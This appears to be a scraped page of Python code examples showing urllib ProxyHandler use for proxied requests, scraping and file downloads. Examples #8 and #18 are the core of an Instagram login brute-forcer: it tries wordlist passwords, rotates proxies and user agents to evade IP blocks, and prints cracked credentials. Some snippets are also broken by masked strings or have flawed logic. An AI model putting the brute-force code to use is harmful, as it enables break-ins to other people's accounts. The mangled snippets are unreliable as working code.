Exemple #1
0
from urllib import request

# 没有使用代理ip
url = 'http://httpbin.org/ip'
resp = request.urlopen(url)
print(resp.read())

# 使用代理的 ip
url = 'http://httpbin.org/ip'
# 1. 代理的原理:在请求某个目的网站时,先请求代理服务器,然后
#    在让代理服务器去请求目的网站,代理服务器拿到目的网站的数据
#    后再转发到我们的服务器上的
# 2. http://httpbin.org 这个网站可以方便的查看 http 参数
# 3. 在代码中使用代理
#    (a)urllib.request.ProxyHandler 传入一个字典类型的代理
#    (b)使用上一步骤创建的 handler 以及 build_opener 创建一个opener对象
#    (c)使用上一步骤创建的opener,调用open函数发起调用
handler = request.ProxyHandler({'http': '118.212.106.7:9999'})
opener = request.build_opener(handler)
resp = opener.open(url)
print(resp.read().decode('utf-8'))
#"origin": "111.18.97.50, 111.18.97.50"
Exemple #2
0
'''
代理proxy
'''

from urllib import request

url = 'http://httpbin.org/ip'

proxy = {
    #键值对的形式,http和https都写上,端口要写对应的
    'http': '50.233.137.33:80',
    'https': '50.233.137.33:80'
}

# 创建代理处理器
proxies = request.ProxyHandler(proxy)
# 创建opener对象
opener = request.build_opener(proxies)
resp = opener.open(url)
print(resp.read().decode())
Exemple #3
0
    def _http_opener(self, url, headers=None, auth=True):
        """
            Configure a HTTP opener for sync operations

            Args:
                url: the target URL
        """

        repository = self.repository
        config = repository.config

        # Configure opener headers
        addheaders = []
        if headers:
            addheaders.extend(headers)

        # Configure opener handlers
        handlers = []

        # Proxy handling
        proxy = repository.proxy or config.proxy or None
        if proxy:
            # Figure out the protocol from the URL
            url_split = url.split("://", 1)
            if len(url_split) == 2:
                protocol = url_split[0]
            else:
                protocol = "http"
            proxy_handler = urllib2.ProxyHandler({protocol: proxy})
            handlers.append(proxy_handler)

        # Authentication handling
        if auth:
            username = repository.username
            password = repository.password
            if username and password:
                # Add a 401 handler (in case Auth header is not accepted)
                passwd_manager = urllib2.HTTPPasswordMgrWithDefaultRealm()
                passwd_manager.add_password(
                    realm=None,
                    uri=url,
                    user=username,
                    passwd=password,
                )
                auth_handler = urllib2.HTTPBasicAuthHandler(passwd_manager)
                handlers.append(auth_handler)

        # Create the opener
        opener = urllib2.build_opener(*handlers)
        if auth and username and password:
            # Send credentials unsolicitedly to force login - otherwise
            # the request would be treated as anonymous if login is not
            # required (i.e. no 401 triggered), but we want to login in
            # any case:
            import base64
            base64string = base64.encodestring('%s:%s' %
                                               (username, password))[:-1]
            addheaders.append(("Authorization", "Basic %s" % base64string))

        if addheaders:
            opener.addheaders = addheaders

        return opener
login_data = parse.urlencode([
    ('username', email),
    ('password', passwd),
    ('entry', 'mweibo'),
    ('client_id', ''),
    ('savestate', '1'),
    ('ec', ''),
    ('pagerefer', 'https://passport.weibo.cn/signin/welcome?entry=mweibo&r=http%3A%2F%2Fm.weibo.cn%2F')
])

req = request.Request('https://passport.weibo.cn/sso/login')
req.add_header('Origin', 'https://passport.weibo.cn')
req.add_header('User-Agent', 'Mozilla/6.0 (iPhone; CPU iPhone OS 8_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/8.0 Mobile/10A5376e Safari/8536.25')
req.add_header('Referer', 'https://passport.weibo.cn/signin/login?entry=mweibo&res=wel&wm=3349&r=http%3A%2F%2Fm.weibo.cn%2F')

with request.urlopen(req, data=login_data.encode('utf-8')) as f:
    print('Status:', f.status, f.reason)
    for k, v in f.getheaders():
        print('%s: %s' % (k, v))
    print('Data:', f.read().decode('utf-8'))

print("----------post end------------")

# with proxy and proxy auth
proxy_handler = request.ProxyHandler({'http': 'http://www.example.com:3128/'})
proxy_auth_handler = request.ProxyBasicAuthHandler()
proxy_auth_handler.add_password('realm', 'host', 'username', 'password')
opener = request.build_opener(proxy_handler, proxy_auth_handler)
with opener.open('http://www.example.com/login.html') as f:
    pass
import urllib.request as request
import requests

proxies = {
    'https': 'https://127.21.21.1:1080',
    'http': 'http://127.21.21.1:1080'
}

headers = {
    'user-agent':
    'Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36'
}

GOOGLE_URL = 'https://www.google.com'
opener = request.build_opener(request.ProxyHandler(proxies))
request.install_opener(opener)

req = request.Request(GOOGLE_URL, headers=headers)
response = request.urlopen(req)
print(response.read().decode())

response = requests.get(GOOGLE_URL, proxies=proxies)
print(response.text)
Exemple #6
0
from urllib import request

# # 没有使用代理
# url = "http://httpbin.org/ip"
# resp = request.urlopen(url)
# print(resp.read())

# 使用代理
# proxyHandler
url = "http://httpbin.org/ip"
proxyHandler = request.ProxyHandler({"http": "39.137.2.194:8080"})
opener = request.build_opener(proxyHandler)

resp = opener.open(url)
print(resp.read())
Exemple #7
0
    'password': '******',
    'passwordCheck': '123456',
    'metadata1': ''
}

missKey = ['customerName', 'email', 'password', 'passwordCheck']

for key in post_dict.keys():
    if key not in missKey:
        elem = driver.find_element_by_name(key)
        value = elem.get_attribute('value')
        post_dict[key] = value

cookie = cookiejar.CookieJar()
handler = request.HTTPCookieProcessor(cookie)
proxy_support = request.ProxyHandler({'sock5': 'localhost:1080'})
opener = request.build_opener(handler)

headers = {
    'User-Agent':
    'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36'
}
req = request.Request(regurl,
                      data=parse.urlencode(post_dict).encode('utf-8'),
                      headers=headers)

print(post_dict)

with opener.open(req) as f:
    with open('c.html', 'wb') as html:
        html.write(f.read())
Exemple #8
0
def brute(q):
    """
    main worker function
    :param word:
    :param event:
    :return:
    """
    if not q.empty():
        try:
            proxy = None
            if len(proxys_working_list) != 0:
                proxy = random.choice(list(proxys_working_list.keys()))

            word = q.get()
            word = word.replace("\r", "").replace("\n", "")

            post_data = {
                'username': USER,
                'password': word,
            }

            header = {
                "User-Agent": random.choice(user_agents),
                'X-Instagram-AJAX': '1',
                "X-CSRFToken": csrf_token,
                "X-Requested-With": "XMLHttpRequest",
                "Referer": "https://www.instagram.com/",
                "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
                'Cookie': 'csrftoken=' + csrf_token
            }

            if proxy:
                if _verbose:
                    print(bcolors.BOLD + "[*] Trying %s %s " % (word, " | " + proxy,) + bcolors.ENDC)

                opener = rq.build_opener(
                    rq.ProxyHandler({'https': 'https://' + proxy}),
                    rq.HTTPHandler(),
                    rq.HTTPSHandler()
                )

            else:
                if _verbose:
                    print(bcolors.BOLD + "[*] Trying %s" % (word,) + bcolors.ENDC)

                opener = rq.build_opener(
                    rq.HTTPHandler(),
                    rq.HTTPSHandler()
                )

            rq.install_opener(opener)

            req = rq.Request(URL, data=http_parser.urlencode(post_data).encode('ascii'), headers=header)
            sock = rq.urlopen(req)

            if sock.read().decode().find('"authenticated": true') != -1:
                print(bcolors.OKGREEN + bcolors.BOLD + "\n[*]Successful Login:"******"---------------------------------------------------")
                print("[!]Username: "******"[!]Password: "******"---------------------------------------------------\n" + bcolors.ENDC)
                found_flag = True
                q.queue.clear()
                q.task_done()

        except HTTPError as e:
            if e.getcode() == 400 or e.getcode() == 403:
                if e.read().decode("utf8", 'ignore').find('"checkpoint_required"') != -1:
                    print(bcolors.OKGREEN + bcolors.BOLD + "\n[*]Successful Login "
                          + bcolors.FAIL + "But need Checkpoint :|" + bcolors.OKGREEN)
                    print("---------------------------------------------------")
                    print("[!]Username: "******"[!]Password: "******"---------------------------------------------------\n" + bcolors.ENDC)
                    found_flag = True
                    q.queue.clear()
                    q.task_done()
                    return
                elif proxy:
                    print(bcolors.WARNING +
                          "[!]Error: Proxy IP %s is now on Instagram jail ,  Removing from working list !" % (proxy,)
                          + bcolors.ENDC
                          )
                    if proxy in proxys_working_list:
                        proxys_working_list.pop(proxy)
                    print(bcolors.OKGREEN + "[+] Online Proxy: ", str(len(proxys_working_list)) + bcolors.ENDC)
                else:
                    print(bcolors.FAIL + "[!]Error : Your Ip is now on Instagram jail ,"
                          " script will not work fine until you change your ip or use proxy" + bcolors.ENDC)
            else:
                print("Error:", e.getcode())

            q.task_done()
            return

        except Exception as err:
            if _debug:
                print(bcolors.FAIL + "[!] Unknown Error in request." + bcolors.ENDC)
                logger.error(err)
            else:
                print(bcolors.FAIL + "[!] Unknown Error in request, please turn on debug mode with -d" + bcolors.ENDC)

            pass
            return
Exemple #9
0
from urllib import request

url = 'http://ip.27399.com/'

# 1、构造一个字典传入一个代理地址
proxy = {"http": "106.13.117.143:3128"}

# 2、构建代理地址
proxyHandler = request.ProxyHandler(proxy)

# 3、构造urllib 要求的urlopener打开器
opener = request.build_opener(proxyHandler)

# 4、爬虫数据-json数据处理、进行安装
request.install_opener(opener)

# 构造请求对象
req = request.Request(url)
# 网页请求
html = request.urlopen(req).read()
print(html.decode())
Exemple #10
0
def get_modisfiles(username,
                   password,
                   platform,
                   product,
                   year,
                   tile,
                   proxy,
                   doy_start=1,
                   doy_end=-1,
                   base_url="http://e4ftl01.cr.usgs.gov",
                   out_dir=".",
                   verbose=False,
                   reconnection_attempts=200,
                   check_sizes=False):
    """Download MODIS products for a given tile, year & period of interest

    This function uses the `urllib2` module to download MODIS "granules" from
    the USGS website. The approach is based on downloading the index files for
    any date of interest, and parsing the HTML (rudimentary parsing!) to search
    for the relevant filename for the tile the user is interested in. This file
    is then downloaded in the directory specified by `out_dir`.

    The function can also check if complete files exist locally.
    If it does, it checks that the remote and local file sizes are identical.
    If they are, file isn't downloaded, but if they are different, the remote
    file is downloaded.

    Parameters
    ----------
    username: str
        The EarthData username string
    password: str
        The EarthData username string
    platform: str
        One of three: MOLA, MOLT MOTA
    product: str
        The product name, such as MOD09GA.005 or MYD15A2.005. Note that you
        need to specify the collection number (005 in the examples)
    year: int
        The year of interest
    tile: str
        The tile (e.g., "h17v04")
    proxy: dict
        A proxy definition, such as {'http': 'http://127.0.0.1:8080', \
        'ftp': ''}, etc.
    doy_start: int
        The starting day of the year.
    doy_end: int
        The ending day of the year.
    base_url: str, url
        The URL to use. Shouldn't be changed, unless USGS change the server.
    out_dir: str
        The output directory. Will be create if it doesn't exist
    verbose: Boolean
        Whether to sprout lots of text out or not.
    reconnection_attempts: int, default 5
        Number of times to attempt to open HTTP Connection before giving up.
    check_sizes : boolean, default False
        If True then first retrieve remote file size to check against local file.
        Only use on legacy dataset directories which were downloaded before 
        13 October 2016, when code based switched to naming files in progress
        with .part, rendering this option unnecessary.

    Returns
    -------
    Nothing
    """

    if proxy is not None:
        proxy = urllib2.ProxyHandler(proxy)
        opener = urllib2.build_opener(proxy)
        urllib2.install_opener(opener)

    if not os.path.exists(out_dir):
        if verbose:
            LOG.info("Creating outupt dir %s" % out_dir)
        os.makedirs(out_dir)
    if doy_end == -1:
        if calendar.isleap(year):
            doy_end = 367
        else:
            doy_end = 366

    dates = [
        time.strftime("%Y.%m.%d", time.strptime("%d/%d" % (i, year), "%j/%Y"))
        for i in range(doy_start, doy_end)
    ]
    url = "%s/%s/%s/" % (base_url, platform, product)
    dates_available = None

    count_reconn_attempts = 0
    while count_reconn_attempts <= reconnection_attempts:
        if verbose:
            LOG.info("Session Attempt %d" % (count_reconn_attempts + 1))

        try:
            with requests.Session() as s:
                s.mount(base_url, requests.adapters.HTTPAdapter(max_retries=5))

                ## Login to the EarthData Service for this session
                # First get an authenticity token
                r = s.get('https://urs.earthdata.nasa.gov/')
                parsed_html = BeautifulSoup(r.text, 'lxml')
                token = parsed_html.body.find(
                    'input', attrs={'name': 'authenticity_token'})['value']

                # Now do the login, providing the token
                r = s.post('https://urs.earthdata.nasa.gov/login',
                           data={
                               'username': username,
                               'password': password,
                               'authenticity_token': token,
                               'utf8': '&#x2713;'
                           })
                if not r.ok:
                    raise IOError('Could not log in to EarthData server: %s' %
                                  r)
                else:
                    print('LOGGED IN')
                # Reset return object
                r = None

                if dates_available is None:
                    dates_available = parse_modis_dates(
                        s,
                        url,
                        dates,
                        product,
                        tile,
                        out_dir,
                        check_sizes=check_sizes)

                while len(dates_available) > 0:

                    date = dates_available.pop(0)

                    r = s.get("%s/%s" % (url, date), verify=False)
                    download = False
                    for line in r.text.split("\n"):

                        if (line.find(tile) >= 0) & \
                            (line.find(".hdf") >= 0 > line.find(".hdf.xml")):

                            # Find remote file name and URL
                            fname = line.split("href=")[1].split(">")[0].strip(
                                '"')
                            the_url = "%s%s/%s" % (url, date, fname)

                            # Set download flag
                            download = True
                            r = None
                            # File found so break out of loop
                            break

                    if not download:
                        LOG.info('File not found for date: %s' % date)
                        continue

                    # If local file present, check if it is complete
                    # Incomplete files will still have .part suffix
                    rfile = None
                    if os.path.exists(os.path.join(out_dir, fname)):

                        if check_sizes:
                            # Open link to remote file
                            #r1 = s.request('get', the_url, timeout=(5,5))
                            rfile = s.get(the_url, stream=True, timeout=(5, 5))
                            if not rfile.ok:
                                raise IOError("Can't access... [%s]" % the_url)
                            # Get remote file size
                            remote_file_size = int(
                                rfile.headers['content-length'])

                            local_file_size = os.path.getsize(os.path.join( \
                                out_dir, fname ) )

                            # Skip download if local and remote sizes match
                            if remote_file_size == local_file_size:
                                download = False
                                if verbose:
                                    LOG.info(
                                        "File %s already present. Skipping" %
                                        fname)
                            else:
                                if verbose:
                                    LOG.info(
                                        "Local version of %s incomplete, will be overwritten."
                                        % fname)

                        else:
                            download = False

                    if download:

                        # Open stream to remote file
                        # Stream might have been opened above, check
                        if rfile is None:
                            rfile = s.get(the_url, stream=True, timeout=(9, 9))
                            if not rfile.ok:
                                raise IOError("Can't access... [%s]" % the_url)
                            # Get remote file size
                            remote_file_size = int(
                                rfile.headers['content-length'])

                        LOG.info(
                            "Starting download on %s(%d bytes) ..." %
                            (os.path.join(out_dir, fname), remote_file_size))
                        with open(os.path.join(out_dir, fname + '.part'),
                                  'wb') as fp:
                            for chunk in rfile.iter_content(chunk_size=CHUNKS):
                                if chunk:
                                    fp.write(chunk)
                            #fp.flush() # disabled 2016/11/15, takes ages with no clear benefit
                            #os.fsync(fp.fileno())
                            if verbose:
                                LOG.info("\tDone!")

                        # Once download finished, remove .part suffix
                        os.rename(os.path.join(out_dir, fname + '.part'),
                                  os.path.join(out_dir, fname))

                # Finished looping through dates with while
                if verbose:
                    LOG.info("All downloads complete")

                return

        except requests.exceptions.Timeout:
            # Don't increment connection number
            dates.insert(0, date)
            if verbose:
                LOG.info('Timeout error, opening new session')
            continue

        except requests.exceptions.ConnectionError:

            # Increment number of reconnection attempts
            count_reconn_attempts += 1

            # Put the most recent (failed) date back into the list
            dates_available.insert(0, date)

            # Begin the re-connection process (unless max attempts reached)
            continue

        # If we manage to get here then the download session has been successful
        # Break out of the session reconnect loop
        break

    # Raise error if download session failed
    if count_reconn_attempts == reconnection_attempts:
        print('Maximum number of Session reconnection attempts reached.')
        raise requests.exceptions.ConnectionError
Exemple #11
0
from urllib import request

url = "http://httpbin.org/ip"
re = request.urlopen(url)
print(re.read().decode("utf-8"))

handler = request.ProxyHandler({"http": "121.237.148.192:3000"})
opener = request.build_opener(handler)
req = request.Request(url)
se = opener.open(url)
print(se.read().decode("utf-8"))
import os
import urllib.request as req
from urllib.request import urlretrieve
from bs4 import BeautifulSoup
import json
from pprint import pprint
from utils import BaiDuCartoonUtils
import os.path

url = "http://cartoon.baidu.com/category"

filePath = r"H:/GIT/Python/Spider/CartoonSpider/file/categories/"

user_agent = 'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)'
# 设置代理 IP,http 不行,使用 https
proxy = req.ProxyHandler({'https': 's1firewall:8080'})
auth = req.HTTPBasicAuthHandler()
# 构造 opener
opener = req.build_opener(proxy, auth, req.HTTPHandler)
# 添加 header
opener.addheaders = [('User-Agent', user_agent)]
# 安装 opener
req.install_opener(opener)
# 打开链接
conn = req.urlopen(url)
# 以 utf-8 编码获取网页内容
content = conn.read().decode('utf-8')
# 输出
print(content)

# 生成 soup 对象,准备解析 html
Exemple #13
0
from urllib import request
import time
from lxml import etree

url = "http://www.httpbin.org/ip"
#"124.64.16.94, 124.64.16.94"  #本机的
res = request.urlopen(url).read()
print(res)
# ip的格式:{'type':'ip:端口号'}
for i in range(1, 6):
    daili_url = "https://www.kuaidaili.com/free/inha/" + str(i) + "/"
    res1 = request.urlopen(daili_url).read().decode()
    ele = etree.HTML(res1)
    IP = ele.xpath('//td[@data-title="IP"]/text()')
    PORT = ele.xpath('//td[@data-title="PORT"]/text()')
    TYPE = ele.xpath('//td[@data-title="类型"]/text()')
    proxy = {}
    for j in range(len(IP)):
        proxy[TYPE[j]] = IP[j] + ":" + PORT[j]
        handler = request.ProxyHandler(proxy)  # 构建一个代理handler
        opener = request.build_opener(handler)
        res2 = opener.open(url).read()
        print(proxy, res2)
        if res2 != res:  # 检测和主机IP地址是否一致
            with open("ip.txt", "a", encoding="utf-8") as w:
                w.write(str(proxy) + "\n")
    time.sleep(2)
Exemple #14
0
import urllib.request as ur
import random

url = 'https://www.dy2018.com/i/31210.html'

iplist = ['219.157.114.65']
proxy_support = ur.ProxyHandler({'http': random.choice(iplist)})
#创建一个opener
opener = ur.build_opener(proxy_support)
opener.addheaders = [(
    'User-Agent',
    'Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36'
)]
#安装opener
ur.install_opener(opener)
response = ur.urlopen(url)
html = response.read().decode('gb2312')
print(html)
Exemple #15
0
            data = {}
            data['i'] = a
            data['from'] = 'AUTO'
            data['to'] = 'AUTO'
            data['smartresult'] = 'dict'
            data['client'] = 'fanyideskweb'
            data['doctype'] = 'json'
            data['version'] = '2.1'
            data['keyfrom'] = 'fanyi.web'
            data['action'] = 'FY_BY_REALTlME'
            data['typoResult'] = 'false'
            data = urllib.parse.urlencode(data).encode('utf-8')
            response = url_r.urlopen(url, data)
            cat_imge = response.read().decode('utf-8')
            print(type(cat_imge))
            resoult = json.loads(cat_imge)['translateResult'][0][0]['tgt']
            g.msgbox(resoult, title=title1)


translation()'''  # 爬有道翻译

url = 'http://45.32.164.128/ip.php'
proxy_support = url_r.ProxyHandler({'http':'58.253.155.215:9999'})
opener = url_r.build_opener(proxy_support)
opener.addheaders = [('User-Agent', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) '
                                    'Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.62')]
response = url_r.urlopen(url)
html1 = response.read().decode('utf_8')
# html = json.loads(html1)
print(html1)
Exemple #16
0
def install_proxy(proxy_handler: Dict[str, str]) -> None:
    proxy_support = request.ProxyHandler(proxy_handler)
    opener = request.build_opener(proxy_support)
    request.install_opener(opener)
Exemple #17
0
#     print(error)
#     while retry_num < RETRY:
#         try:
#             proxy = pu.get_random_ip(proxies)
#             handler = req.ProxyHandler({"http": proxy})
#             opener = req.build_opener(handler)
#             req.install_opener(opener)
#             print('retrying %s' % proxy)
#             response = req.urlopen("https://book.douban.com/tag/?view=cloud")
#         except Exception as error:
#             print("Retry %d time. with proxy %s" % (retry_num, proxy))
#             print(error)
#             retry_num += 1
#             continue


handler = req.ProxyHandler({"https": proxy_fixed})

opener = req.build_opener()  # req.build_opener(handler)
opener.addheaders = {('User-agent', 'Mozilla/5.0')}
req.install_opener(opener)
response = req.urlopen(testdouban)

soup = bs4.BeautifulSoup(response, 'html.parser')
print(soup)

print(proxies.__len__())
ip = pu.get_random_ip(proxies)
proxies.remove(ip)

print(proxies.__len__())
Exemple #18
0
def brute(q):
    """
    main worker function
    :param word:
    :param event:
    :return:
    """
    if not q.empty():
        try:
            proxy = None
            if len(proxys_working_list) != 0:
                proxy = random.choice(list(proxys_working_list.keys()))

            word = q.get()
            word = word.replace("\r", "").replace("\n", "")

            post_data = {
                'username': USER,
                'password': word,
            }

            header = {
                "User-Agent": random.choice(user_agents),
                'X-Instagram-AJAX': '1',
                "X-CSRFToken": csrf_token,
                "X-Requested-With": "XMLHttpRequest",
                "Referer": "https://www.instagram.com/",
                "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
                'Cookie': 'csrftoken=' + csrf_token
            }

            if proxy:
                if _verbose:
                    print(y+"[+]"+w+" Password incorrect %s %s " % (word, proxy,))

                opener = rq.build_opener(
                    rq.ProxyHandler({'https': 'https://' + proxy}),
                    rq.HTTPHandler(),
                    rq.HTTPSHandler()
                )

            else:
                if _verbose:
                    print(y+"[+]"+w+" Password incorrect %s" % (word,))

                opener = rq.build_opener(
                    rq.HTTPHandler(),
                    rq.HTTPSHandler()
                )

            rq.install_opener(opener)

            req = rq.Request(URL, data=http_parser.urlencode(post_data).encode('ascii'), headers=header)
            sock = rq.urlopen(req)

            if sock.read().decode().find('"authenticated": true') != -1:
                print(c+"\n[+]"+w+" Successfully login")
                print(w+"    Username: "******"    Password: "******"utf8", 'ignore').find('"checkpoint_required"') != -1:
                    print(c+"\n[!]"+w+" Successfully login, but checkpoint")
                    print("")
                    print(r+"[!]"+w+" Username: "******"[!]"+w+" Password: "******"")
                    found_flag = True
                    q.queue.clear()
                    q.task_done()
                    return
                elif proxy:
                    print(r+"[!] Error:"+w+" Proxy IP %s now is blocked by instagram" % (proxy,))
                    if proxy in proxys_working_list:
                        proxys_working_list.pop(proxy)
                    print(c+"[+]"+w+" Online Proxy: ", str(len(proxys_working_list)))
                else:
                    print(r+"[!ERROR]"+w+" Your IP now is blocked by instagram")
                    print(r+"[!ERROR]"+w+" Please use Proxy or VPN")
            else:
                print(r+"[!]"+w+" Error:", e.getcode())

            q.task_done()
            return

        except Exception as err:
            if _debug:
                print(r+"[!]"+w+" Problems in the proxy connection")
                logger.error(err)
            else:
                print(r+"[!]"+w+" Problems in the proxy connection")

            pass
            return
Exemple #19
0
    # print(proxy_listy)

    for p in all_xi_url:
        proxy_lists.append(p[0] + ':' + p[1])
        # print(proxy_lists)
    for uuu in proxy_lists:
        # print(uuu)
        proxy_list = [
            {
                "http": uuu
            },
        ]
        # print(proxy_list)
        # for i in proxy_list:
        prxoy = random.choice(proxy_list)
        httpproxy_handler = request.ProxyHandler(prxoy)

        opener = request.build_opener(httpproxy_handler)
        req = request.Request('http://httpbin.org/get')

        try:
            response = opener.open(req, timeout=3)
        except error.HTTPError as err:
            print(err.code)
            print(err.reason)
        except error.URLError as err:
            print(err.reason)
        else:
            dict = {'http': str(prxoy)}
            # dict['http'] = prxoy
            # ci_dict.append(prxoy)
Exemple #20
0
from urllib import request

px = request.ProxyHandler({'http': '106.60.44.145:80'})
opener = request.build_opener(px)
req = request.Request('http://travel.qunar.com/p-oi5740179-guangzhouta')
res = opener.open(req)
'''如果我们使用install_opener(),以下代码可以把之前自定义的opener设置成全局的'''
# request.install_opener(opener)
# res=request.urlopen(req)
with open('a.html', 'wb') as f:
    f.write(res.read())
Exemple #21
0
 def __init__(self):
     self.proxy_handler = request.ProxyHandler(randproxies())
     self._cookie = cookiejar.CookieJar()
     self.cookie_handler = request.HTTPCookieProcessor(self._cookie)
     self.opener = request.build_opener(self.proxy_handler,
                                        self.cookie_handler)
Exemple #22
0
    def download(self, url):
        time.sleep(3)
        # 如果链接为空 或者访问异常返回空
        if url is None:
            return None
        # 设置代理IP,有多个时,以字典的形式存放
        # 设置代理IP
        proxy = {
            "http": "192.168.69.118",
            "http": "192.168.69.117",
            "http": "192.168.69.115",
            "http": "192.168.69.114",
            "http": "192.168.69.113",
            "http": "192.168.69.112",
            "http": "192.168.69.111",
            "http": "192.168.69.110",
            "http": "192.168.69.109",
            "http": "192.168.69.108",
            "http": "192.168.69.107",
            "http": "192.168.69.106",
            "http": "192.168.69.105",
            "http": "192.168.69.104",
            "http": "192.168.69.103",
            "http": "192.168.69.102",
            "http": "192.168.69.101",
            "http": "192.168.69.100",
            "http": "192.168.69.99",
            "http": "192.168.69.98",
            "http": "192.168.69.97",
            "http": "192.168.69.96",
            "http": "192.168.69.95",
            "http": "192.168.69.94",
            "http": "192.168.69.93",
            "http": "192.168.69.92",
            "http": "192.168.69.91",
            "http": "192.168.69.90",
            "http": "192.168.69.89",
            "http": "192.168.69.88",
            "http": "192.168.69.87",
            "http": "192.168.69.86",
            "http": "192.168.69.85",
            "http": "192.168.69.84",
            "http": "192.168.69.83",
            "http": "192.168.69.82",
            "http": "192.168.69.81",
            "http": "192.168.69.80",
            "http": "192.168.69.79",
            "http": "192.168.69.78",
            "http": "192.168.69.77",
            "http": "192.168.69.76",
            "http": "192.168.69.75",
            "http": "192.168.69.74",
            "http": "192.168.69.73",
            "http": "192.168.69.72",
            "http": "192.168.69.71",
            "http": "192.168.69.69",
            "http": "192.168.69.68",
            "http": "192.168.69.67",
            "http": "192.168.69.66",
            "http": "192.168.69.65",
            "http": "192.168.69.64",
            "http": "192.168.69.63",
            "http": "192.168.69.62",
            "http": "192.168.69.61",
            "http": "192.168.69.60",
            "http": "192.168.69.52",
            "http": "192.168.69.50",
            "http": "192.168.69.49",
            "http": "192.168.69.48",
            "http": "192.168.69.47",
            "http": "192.168.69.46",
            "http": "192.168.69.45",
            "http": "192.168.69.44",
            "http": "192.168.69.43",
            "http": "192.168.69.42",
            "http": "192.168.69.41",
            "http": "192.168.69.40",
            "http": "192.168.69.39",
            "http": "192.168.69.38",
            "http": "192.168.69.37",
            "http": "192.168.69.36",
            "http": "192.168.69.35",
            "http": "192.168.69.34",
            "http": "192.168.69.33",
            "http": "192.168.69.32",
            "http": "192.168.69.31",
            "http": "192.168.69.30",
            "http": "192.168.69.29",
            "http": "192.168.69.28",
            "http": "192.168.69.27",
            "http": "192.168.69.26",
            "http": "192.168.69.25",
            "http": "192.168.69.24",
            "http": "192.168.69.23",
            "http": "192.168.69.22",
            "http": "192.168.69.21",
            "http": "192.168.69.19",
            "http": "192.168.69.18",
            "http": "192.168.69.17",
            "http": "192.168.69.16",
            "http": "192.168.69.15",
            "http": "192.168.69.14",
            "http": "192.168.69.13",
            "http": "192.168.69.12",
            "http": "192.168.69.11",
            "http": "192.168.69.10",
        }
        proxy_support = request.ProxyHandler(proxy)
        opener = request.build_opener(proxy_support)
        request.install_opener(opener)

        #设置一个cookie处理器,负责从服务器下载cookie到本地,并在发送请求时带上本地的cookie
        cj = http.cookiejar.LWPCookieJar()
        cookie_support = request.HTTPCookieProcessor(cj)
        opener_cookie = request.build_opener(cookie_support,
                                             request.HTTPHandler)
        request.install_opener(opener_cookie)

        #加进header,伪装成浏览器访问
        #  req.add_header('User-Agent','Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6')      #添加header
        hdr = {
            'User-Agent':
            'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safari/537.11',
            'Accept':
            'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
            'Accept-Charset': 'ISO-8859-1,utf-8;q=0.7,*;q=0.3',
            'Accept-Encoding': 'none',
            'Accept-Language': 'en-US,en;q=0.8',
            'Connection': 'keep-alive'
        }
        req = request.Request(url, headers=hdr)
        response = request.urlopen(req)

        if response.getcode() != 200:
            return None
        #返回网页源代码
        return response.read()
Exemple #23
0
def unset_proxy():
    proxy_handler = request.ProxyHandler({})
    opener = request.build_opener(proxy_handler)
    request.install_opener(opener)
Exemple #24
0
from urllib import request,error

if __name__ == '__main__':
    url = "http://www.baidu.com"

    # 添加代理
    # 1 设置代理ip
    proxy = {'http':'111.205.46.29:80'}
    # 2 创建ProxyHandler
    proxy_support = request.ProxyHandler(proxy)
    # 3 创建opener
    opener = request.build_opener(proxy_support)
    # 4 安装opener
    request.install_opener(opener)

    try:
        response = request.urlopen(url)
        html = response.read().decode()
        print(html)
    except error.HTTPError as e:
        print(e)
    except error.URLError as e:
        print(e)
    except Exception as e:
        print(e)
Exemple #25
0
# 代理服务器
proxyHost = "http-cla.abuyun.com"
proxyPort = "9030"

# 代理隧道验证信息
proxyUser = "******"
proxyPass = "******"

proxyMeta = "http://%(user)s:%(pass)s@%(host)s:%(port)s" % {
    "host": proxyHost,
    "port": proxyPort,
    "user": proxyUser,
    "pass": proxyPass,
}

proxy_handler = request.ProxyHandler({
    "http": proxyMeta,
    "https": proxyMeta,
})

#auth = request.HTTPBasicAuthHandler()
#opener = request.build_opener(proxy_handler, auth, request.HTTPHandler)

opener = request.build_opener(proxy_handler)

# opener.addheaders = [("Proxy-Switch-Ip", "yes")]
request.install_opener(opener)
resp = request.urlopen(targetUrl).read()

print(resp)
Exemple #26
0
    # Test to see if ArcGIS desktop installed
    if ((os.path.basename(sys.executable).lower() == "arcgispro.exe")
            or (os.path.basename(sys.executable).lower() == "arcmap.exe")
            or (os.path.basename(sys.executable).lower() == "arccatalog.exe")):
        arcgisDesktop = "true"

    # If ArcGIS desktop installed
    if (arcgisDesktop == "true"):
        argv = tuple(
            arcpy.GetParameterAsText(i)
            for i in range(arcpy.GetArgumentCount()))
    # ArcGIS desktop not installed
    else:
        argv = sys.argv
        # Delete the first argument, which is the script
        del argv[0]
    # Logging
    if (enableLogging == "true"):
        # Setup logging
        logger, logMessage = setLogging(logFile)
        # Log start of process
        logger.info("Process started.")
    # Setup the use of a proxy for requests
    if (enableProxy == "true"):
        # Setup the proxy
        proxy = urllib2.ProxyHandler({requestProtocol: proxyURL})
        openURL = urllib2.build_opener(proxy)
        # Install the proxy
        urllib2.install_opener(openURL)
    mainFunction(*argv)
Exemple #27
0
        for child in children:
            child.hide()
            if child.get_name() == "c_box":
                c_widgets = child.get_children()
                for c_widget in c_widgets:
                    c_widget.hide()
        self.main_stack.set_visible_child_name("side_view_page")
        self.header_stack.set_visible_child_name("side_view")
        self.search_entry.grab_focus()
        self.current_sidepage = None

    def quit(self, *args):
        self.window.destroy()
        Gtk.main_quit()


if __name__ == "__main__":
